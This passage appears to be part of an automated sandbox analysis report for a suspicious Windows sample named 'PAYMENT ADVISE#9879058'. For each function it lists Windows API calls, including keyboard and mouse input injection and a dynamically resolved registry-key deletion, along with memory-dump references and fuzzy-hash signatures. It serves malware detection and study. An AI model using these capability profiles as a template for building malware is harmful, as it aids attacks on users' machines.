                            • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                          • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                          • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                          • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                          • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                          Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                          Download Yara Rule
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 00415690
                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                          • ___fls_getvalue@4.LIBCMT ref: 0041569B
                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                          • ___fls_setvalue@8.LIBCMT ref: 004156AD
                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                          • ExitThread.KERNEL32 ref: 004156BD
                          • __freefls@4.LIBCMT ref: 004156D9
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                          • String ID:
                          • API String ID: 4166825349-0
                          • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                          • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                          • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                          • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                          Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                          • API String ID: 2574300362-3261711971
                          • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                          • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                          • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                          • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                          Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                          • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                          • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                          • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                          Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00433724
                          • GetWindowRect.USER32(00000000,?), ref: 00433757
                          • GetClientRect.USER32(0000001D,?), ref: 004337AC
                          • GetSystemMetrics.USER32(0000000F), ref: 00433800
                          • GetWindowRect.USER32(?,?), ref: 00433814
                          • ScreenToClient.USER32(?,?), ref: 00433842
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$MetricsScreenSystem
                          • String ID:
                          • API String ID: 3220332590-0
                          • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                          • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                          • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                          • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                          Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _malloc_wcslen$_strcat_wcscpy
                          • String ID:
                          • API String ID: 1612042205-0
                          • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                          • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                          • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                          • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                          Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                          • SetKeyboardState.USER32(00000080), ref: 0044C59B
                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                          • SendInput.USER32 ref: 0044C6E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$InputSend
                          • String ID:
                          • API String ID: 2221674350-0
                          • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                          • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                          • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                          • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                          Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          • API String ID: 2037614760-0
                          • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                          • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                          • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                          • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                          Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                          • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                          • ScreenToClient.USER32(?,?), ref: 00447C39
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                          • EndPaint.USER32(?,?), ref: 00447CD1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                          • String ID:
                          • API String ID: 4189319755-0
                          • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                          • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                          • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                          • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                          Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                          • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID:
                          • API String ID: 1726766782-0
                          • Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                          • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                          • Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                          • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                          Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                          • EnableWindow.USER32(?,00000000), ref: 0044111A
                          • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                          • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                          • EnableWindow.USER32(?,00000001), ref: 004411B3
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                          • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                          • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                          • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                          Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                          • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow$InvalidateRect
                          • String ID:
                          • API String ID: 1976402638-0
                          • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                          • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                          • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                          • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                          Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00442597
                            • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                          • GetDesktopWindow.USER32 ref: 004425BF
                          • GetWindowRect.USER32(00000000), ref: 004425C6
                          • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                          • GetCursorPos.USER32(?), ref: 00442624
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                          • String ID:
                          • API String ID: 4137160315-0
                          • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                          • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                          • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                          • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                          Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$MessageSend
                          • String ID:
                          • API String ID: 1871949834-0
                          • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                          • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                          • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                          • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                          Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0044961A
                          • SendMessageW.USER32 ref: 0044964A
                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                          • _wcslen.LIBCMT ref: 004496BA
                          • _wcslen.LIBCMT ref: 004496C7
                          • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen$_memset_wcspbrk
                          • String ID:
                          • API String ID: 1624073603-0
                          • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                          • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                          • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                          • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                          Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
